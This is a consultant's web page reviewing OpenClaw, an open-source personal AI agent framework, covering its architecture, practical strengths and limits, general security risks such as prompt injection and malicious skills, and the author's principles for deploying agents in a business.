Lab · Agentic AI · Active Exploration
Agentic AI in Business
A living exploration of autonomous agents, personal AI, and what actually works — from someone who’s deploying them in a real business.
I’m exploring agentic AI frameworks hands-on — not as demos, but as actual deployments against real problems. This Lab section documents what I find: what works, what breaks, what the hype gets wrong, and what the security risks actually look like.
Read the first blog post →Entry 01 · April 2026
OpenClaw — The Personal AI Agent
An open-source AI agent framework that runs locally on your machine, connects to LLMs, and executes tasks through WhatsApp, Telegram, Slack, or Discord.
Read the full blog post: I Gave an AI Agent the Keys to My Business →What It Is
OpenClaw is an open-source AI agent framework created by Peter Steinberger, originally launched as Clawdbot in late 2025. It connects large language models to your tools — file system, browser, messaging apps, APIs — and executes real tasks autonomously. You interact with it through WhatsApp or Telegram like texting a colleague. It has 100+ built-in skills and a community registry (ClawHub) with hundreds more.
Core Architecture
Local Node.js service — gateway and message router; runs on your machine
LLM reasoning layer — Claude, GPT, DeepSeek, or local models via your own API keys
100+ built-in skills — plus ClawHub community registry with hundreds more
20+ messaging channels — WhatsApp, Telegram, Slack, Discord as the interaction interface
Scheduled execution — cron jobs ("heartbeats") for autonomous task execution
Privacy-first — data stays local by default; no third-party ingestion
What Works in Practice
Structured, well-defined tasks — research, content drafting, script execution, code deployment
Low-friction interface — existing messaging apps mean no new UI to learn
Local-first architecture — sensitive data stays off third-party servers
Extensible skill system — custom capability building for domain-specific workflows
What Doesn’t — Yet
Reliability — scheduled tasks don't always execute as expected; requires monitoring
Memory — context degrades across sessions; requires user-built memory architecture to compensate
Self-learning — autonomous improvement and proactive idea generation not observed in practice
Agent scaling — no built-in mechanism for spawning or delegating to sub-agents when complexity grows
Security Considerations
This is not optional reading. OpenClaw operates at the system level with significant permissions. The security risks are real, documented, and have affected real deployments — including mine.
Shell and file access — agents can execute shell commands, access file systems, and make network requests
Exposed instances — misconfigured OpenClaw instances have been found exposed to the internet (42,000+ documented)
Third-party skill risk — the ClawHub registry lacks comprehensive vetting; malicious skills have been documented
Prompt injection — embedded instructions in documents or messages can hijack agent behavior
Unintended actions — agents may create, modify, or expose resources beyond the scope of instructions (this happened to me — see the blog post)
Enterprise responses — NVIDIA released NemoClaw (March 2026) with sandboxing and container isolation; Cisco released DefenseClaw for scanning skills and generated code before execution
When to Use an Agent
Use an agent when all three conditions are met. Skip it when any of them isn’t.
Use when:
✓ The task is structured and repeatable
✓ The cost of failure is low or recoverable
✓ You can verify the output before it becomes permanent
Skip when:
✗ The task involves sensitive credentials or intellectual property without sandboxing
✗ You can't verify output before it takes effect (public code pushes, live emails, API calls)
✗ The task requires judgment or context the agent doesn't have
Operational Principles
These are the principles I’m operating with after real-world use. Not theory — practice.
Security first — Evaluate every integration for attack surface. Assume every layer can be compromised.
Structure over natural language — Agents perform better with disciplined instructions than conversational prompts.
Verify before trust — Until reliability improves, treat agent output as draft, not final.
Scope tightly — One agent, one domain. Overloading agents with diverse tasks degrades performance.
Build memory deliberately — Separate brand memory, project memory, and agent memory. Don't rely on built-in persistence.
Coming Next in This Series
Entry 02: Hermes Agent
Self-improving AI and the learning loop — a different model of agent intelligence.
Entry 03: Paperclip AI
Scaling autonomous agent teams — the orchestration problem.
Entry 04: Security Architecture
Designing multi-agent deployments with security as a first-class concern.
This series is updated as I go. Follow the work at the blog or reach out directly.
Exploring agentic AI in your organization?
I help founders and organizations think through AI deployment — security, architecture, and what’s actually worth building. Let’s talk.
Start a Conversation